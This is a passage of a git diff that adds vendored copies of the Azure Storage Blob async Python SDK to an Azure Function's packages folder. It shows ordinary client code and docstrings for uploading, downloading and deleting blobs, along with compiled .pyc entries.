+from ._container_client_async import ContainerClient +from ._blob_service_client_async import BlobServiceClient +from ._lease_async import BlobLeaseClient +from ._download_async import StorageStreamDownloader + + +async def upload_blob_to_url( + blob_url, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + credential=None, # type: Any + **kwargs): + # type: (...) -> dict[str, Any] + """Upload data to a given URL + + The data will be uploaded as a block blob. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param data: + The data to upload. This can be bytes, text, an iterable or a file-like object. + :type data: bytes or str or Iterable + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob_to_url will overwrite any existing data. If set to False, the + operation will fail with a ResourceExistsError. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword dict(str,str) metadata: + Name-value pairs associated with the blob as metadata. 
+ :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword str encoding: + Encoding to use if text is supplied as input. Defaults to UTF-8. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict(str, Any) + """ + async with BlobClient.from_blob_url(blob_url, credential=credential) as client: + return await client.upload_blob(data=data, blob_type=BlobType.BlockBlob, **kwargs) + + +async def _download_to_stream(client, handle, **kwargs): + """Download data to the specified open file-handle.""" + stream = await client.download_blob(**kwargs) + await stream.readinto(handle) + + +async def download_blob_from_url( + blob_url, # type: str + output, # type: str + credential=None, # type: Any + **kwargs): + # type: (...) -> None + """Download the contents of a blob to a local file or stream. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param output: + Where the data should be downloaded to. This could be either a file path to write to, + or an open IO handle to write to. + :type output: str or writable stream + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token or the blob is public. The value can be a SAS token string, + an instance of an AzureSasCredential from azure.core.credentials, + an account shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the local file should be overwritten if it already exists. The default value is + `False` - in which case a ValueError will be raised if the file already exists. If set to + `True`, an attempt will be made to write to the existing file. If a stream handle is passed + in, this value is ignored. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient download algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm.
+ :rtype: None + """ + overwrite = kwargs.pop('overwrite', False) + async with BlobClient.from_blob_url(blob_url, credential=credential) as client: + if hasattr(output, 'write'): + await _download_to_stream(client, output, **kwargs) + else: + if not overwrite and os.path.isfile(output): + raise ValueError("The file '{}' already exists.".format(output)) + with open(output, 'wb') as file_handle: + await _download_to_stream(client, file_handle, **kwargs) + + +__all__ = [ + 'upload_blob_to_url', + 'download_blob_from_url', + 'BlobServiceClient', + 'BlobPrefix', + 'ContainerClient', + 'BlobClient', + 'BlobLeaseClient', + 'ExponentialRetry', + 'LinearRetry', + 'StorageStreamDownloader' +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..bb8d1c5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc new file mode 100644 index 0000000..5fd972e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc new file mode 100644 index 0000000..65ec5f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc new file mode 100644 index 0000000..5bb999c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc new file mode 100644 index 0000000..9a9902c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc new file mode 100644 index 0000000..a62ddbc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc new file mode 100644 index 0000000..d87a7e6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc new file mode 100644 index 0000000..cfc9c2e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc new file mode 100644 index 0000000..27fe9a3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_client_async.py new file mode 100644 index 0000000..9575061 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_client_async.py @@ -0,0 +1,2736 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- +# pylint: disable=too-many-lines, invalid-overridden-method +from functools import partial +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, IO, Iterable, AnyStr, Dict, List, Tuple, + TYPE_CHECKING +) +import warnings + +from azure.core.async_paging import AsyncItemPaged +from azure.core.exceptions import ResourceNotFoundError, HttpResponseError, ResourceExistsError +from azure.core.pipeline import AsyncPipeline +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.decorator_async import distributed_trace_async + + +from .._shared.base_client_async import AsyncStorageAccountHostsMixin, AsyncTransportWrapper +from .._shared.policies_async import ExponentialRetry +from .._shared.response_handlers import return_response_headers, process_storage_error +from .._deserialize import get_page_ranges_result, parse_tags, deserialize_pipeline_response_into_cls +from .._serialize import get_modify_conditions, get_api_version, get_access_conditions +from .._generated.aio import AzureBlobStorage +from .._generated.models import CpkInfo +from .._deserialize import deserialize_blob_properties +from .._blob_client import BlobClient as BlobClientBase +from ._upload_helpers import ( + upload_block_blob, + upload_append_blob, + upload_page_blob) +from .._models import BlobType, BlobBlock, BlobProperties, PageRange +from ._models import PageRangePaged +from ._lease_async import BlobLeaseClient +from ._download_async import StorageStreamDownloader + + +if TYPE_CHECKING: + from datetime import datetime + from .._models import ( # pylint: disable=unused-import + ContentSettings, + ImmutabilityPolicy, + PremiumPageBlobTier, + StandardBlobTier, + SequenceNumberAction + ) + + +class BlobClient(AsyncStorageAccountHostsMixin, BlobClientBase): # pylint: disable=too-many-public-methods + """A client to interact with a specific blob, although that blob may not yet exist. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the blob, + use the :func:`from_blob_url` classmethod. + :param container_name: The container name for the blob. + :type container_name: str + :param blob_name: The name of the blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob_name: str + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`create_snapshot`. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. 
+ :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_client] + :end-before: [END create_blob_client] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a URL to a public blob (no auth needed). + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_client_sas_url] + :end-before: [END create_blob_client_sas_url] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a SAS URL to a blob. + """ + def __init__( + self, account_url, # type: str + container_name, # type: str + blob_name, # type: str + snapshot=None, # type: Optional[Union[str, Dict[str, Any]]] + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + kwargs['retry_policy'] = kwargs.get('retry_policy') or ExponentialRetry(**kwargs) + super(BlobClient, self).__init__( + account_url, + container_name=container_name, + blob_name=blob_name, + snapshot=snapshot, + credential=credential, + **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + @distributed_trace_async + async def get_account_information(self, **kwargs): # type: ignore + # type: (Optional[int]) -> Dict[str, str] + """Gets information related to the storage account in which the blob resides. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return await self._client.blob.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_blob_from_url(self, source_url, **kwargs): + # type: (str, Any) -> Dict[str, Any] + """ + Creates a new Block Blob where the content of the blob is read from a given URL. + The content of an existing blob is overwritten with the new blob. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. 
+ If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. + Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. + :keyword bool include_source_blob_properties: + Indicates if properties from the source blob should be copied. Defaults to True. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + :paramtype tags: dict(str, str) + :keyword bytearray source_content_md5: + Specify the md5 that is used to verify the integrity of the source bytes. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. 
+ :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._upload_blob_from_url_options( + source_url=self._encode_source_url(source_url), + **kwargs) + try: + return await self._client.block_blob.put_blob_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_blob( + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Any + """Creates a new blob from a data source with automatic chunking. + + :param data: The blob data to upload. + :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be + either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. 
If set to False, the + operation will fail with ResourceExistsError. The exception to the above is with Append + blob types: if set to False and the data already exists, an error will not be raised + and the data will be appended to the existing blob. If set overwrite=True, then the existing + append blob will be deleted, and a new one created. Defaults to False. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + If specified, upload_blob only succeeds if the + blob's lease is active and matches this ID. + Required if the blob has an active lease. + :paramtype: ~azure.storage.blob.aio.BlobLeaseClient + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. 
+ + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int max_concurrency: + Maximum number of parallel connections to use when the blob size exceeds + 64MB. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword progress_hook: + An async callback to track the progress of a long-running upload. The signature is + function(current: int, total: Optional[int]) where current is the number of bytes transferred + so far, and total is the size of the blob or None if the size is unknown. + :paramtype progress_hook: Callable[[int, Optional[int]], Awaitable[None]] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START upload_a_blob] + :end-before: [END upload_a_blob] + :language: python + :dedent: 16 + :caption: Upload a blob to the container. + """ + options = self._upload_blob_options( + data, + blob_type=blob_type, + length=length, + metadata=metadata, + **kwargs) + if blob_type == BlobType.BlockBlob: + return await upload_block_blob(**options) + if blob_type == BlobType.PageBlob: + return await upload_page_blob(**options) + return await upload_append_blob(**options) + + @distributed_trace_async + async def download_blob(self, offset=None, length=None, **kwargs): + # type: (Optional[int], Optional[int], Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an async iterator which allows the user to iterate over the content in chunks. + + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance.
+ :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient download algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, download_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword str encoding: + Encoding to decode the downloaded bytes. Default is None, i.e. no decoding. + :keyword progress_hook: + An async callback to track the progress of a long-running download. The signature is + function(current: int, total: int) where current is the number of bytes transferred + so far, and total is the total size of the download. + :paramtype progress_hook: Callable[[int, int], Awaitable[None]] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually.
+ :returns: A streaming object (StorageStreamDownloader) + :rtype: ~azure.storage.blob.aio.StorageStreamDownloader + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START download_a_blob] + :end-before: [END download_a_blob] + :language: python + :dedent: 16 + :caption: Download a blob. + """ + options = self._download_blob_options( + offset=offset, + length=length, + **kwargs) + downloader = StorageStreamDownloader(**options) + await downloader._setup() # pylint: disable=protected-access + return downloader + + @distributed_trace_async + async def delete_blob(self, delete_snapshots=None, **kwargs): + # type: (str, Any) -> None + """Marks the specified blob for deletion. + + The blob is later deleted during garbage collection. + Note that in order to delete a blob, you must delete all of its + snapshots. You can delete both at the same time with the delete_blob() + operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blob + and retains the blob for a specified number of days. + After the specified number of days, the blob's data is removed from the service during garbage collection. + Soft deleted blob is accessible through :func:`~ContainerClient.list_blobs()` specifying `include=['deleted']` + option. Soft-deleted blob can be restored using :func:`undelete` operation. + + :param str delete_snapshots: + Required if the blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. If specified, delete_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. 
literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START delete_blob] + :end-before: [END delete_blob] + :language: python + :dedent: 16 + :caption: Delete a blob. + """ + options = self._delete_blob_options(delete_snapshots=delete_snapshots, **kwargs) + try: + await self._client.blob.delete(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def undelete_blob(self, **kwargs): + # type: (Any) -> None + """Restores soft-deleted blobs or snapshots. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START undelete_blob] + :end-before: [END undelete_blob] + :language: python + :dedent: 12 + :caption: Undeleting a blob. + """ + try: + await self._client.blob.undelete(timeout=kwargs.pop('timeout', None), **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def exists(self, **kwargs): + # type: (**Any) -> bool + """ + Returns True if a blob exists with the defined parameters, and returns + False otherwise. + + :kwarg str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to check if it exists. + :kwarg int timeout: + The timeout parameter is expressed in seconds. + :returns: boolean + """ + try: + await self._client.blob.get_properties( 